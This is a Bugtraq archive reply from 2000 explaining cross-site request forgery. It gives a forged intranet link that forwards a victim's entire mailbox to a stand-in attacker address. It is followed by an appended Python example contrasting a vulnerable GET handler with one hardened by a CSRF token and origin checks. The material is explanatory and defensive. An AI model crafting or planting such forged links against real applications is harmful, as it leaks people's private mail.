Bugtraq mailing list archives

Re: Fwd: CERT Advisory CA-2000-02


From: sekurity () HOTMAIL COM (Cassius)
Date: Thu, 3 Feb 2000 22:11:36 GMT


Shockro,

The danger is also in variables.  Pretend that I get you to click on this
link from within your custom intranet mail app.

http://intranet.example.com/mailbox.asp?action=forward&item=all&recipient=badguy () example com

It would forward all of your mail to badguy () example com.  This would work
because you already have a session with mailbox.asp.

Of course mailbox.asp is fake but you get the idea.

-Cassius
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
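The pattern the post describes (a state-changing action triggered by a GET link that rides on the browser's existing session cookie) next to the checks that stop it, as an added example that is not part of the original post and not code from any real mailbox.asp. `Request`, `SESSIONS`, `OUR_ORIGIN` and both handlers are constructed stand-ins; the forged link below is the one from the post with `@` restored where the archive prints ` () `.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Constructed in-memory session store standing in for the intranet app's
# session state. The CSRF token is minted once per session and is only ever
# embedded in the app's own forms, so a third-party page cannot know it.
SESSIONS = {
    "s-1234": {"user": "victim", "csrf_token": secrets.token_hex(16)},
}

OUR_ORIGIN = "http://intranet.example.com"  # assumed origin of the mail app


@dataclass
class Request:
    """Minimal stand-in for an HTTP request: only the fields the handlers read."""
    method: str
    url: str
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)


def _session_for(req):
    return SESSIONS.get(req.cookies.get("session"))


def _forward(session, item, recipient):
    # Stand-in for the real side effect; just reports what would have happened.
    return 200, f"{session['user']}: forwarded {item} to {recipient}"


def naive_forward_handler(req):
    """The pattern the post warns about: the action and its arguments come
    from GET query parameters and the only authorisation is the ambient
    session cookie. The browser attaches that cookie to any link the user
    clicks, so a link planted by someone else looks like a deliberate request."""
    session = _session_for(req)
    if session is None:
        return 401, "no session"
    params = parse_qs(urlsplit(req.url).query)
    if params.get("action") == ["forward"]:
        return _forward(session, params["item"][0], params["recipient"][0])
    return 400, "unknown action"


def _same_origin(header_value):
    parts = urlsplit(header_value)
    return f"{parts.scheme}://{parts.netloc}" == OUR_ORIGIN


def hardened_forward_handler(req):
    """Same action with three independent checks: state changes only on POST,
    the body must carry the per-session token that only the app's own pages
    know, and an Origin/Referer header, when present, must name our origin."""
    session = _session_for(req)
    if session is None:
        return 401, "no session"
    if req.method != "POST":
        return 405, "state-changing actions require POST"
    token = req.form.get("csrf_token", "")
    # Constant-time compare so the token cannot be recovered byte by byte.
    if not hmac.compare_digest(token.encode(), session["csrf_token"].encode()):
        return 403, "missing or invalid CSRF token"
    origin = req.headers.get("Origin") or req.headers.get("Referer")
    if origin and not _same_origin(origin):
        return 403, "cross-origin request refused"
    if req.form.get("action") != "forward":
        return 400, "unknown action"
    return _forward(session, req.form["item"], req.form["recipient"])


# The link from the post, as the victim's browser would request it.
FORGED_LINK = ("http://intranet.example.com/mailbox.asp"
               "?action=forward&item=all&recipient=badguy@example.com")

if __name__ == "__main__":
    victim = {"session": "s-1234"}
    print("naive   :", naive_forward_handler(Request("GET", FORGED_LINK, victim)))
    print("hardened:", hardened_forward_handler(Request("GET", FORGED_LINK, victim)))
```

The token check is what matters most: requiring POST alone is not enough, because a third-party page can still submit a form with method POST on the user's behalf, and Origin/Referer headers may be stripped by proxies or privacy settings, which is why the hardened handler only rejects on a header that is present and wrong rather than requiring one.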

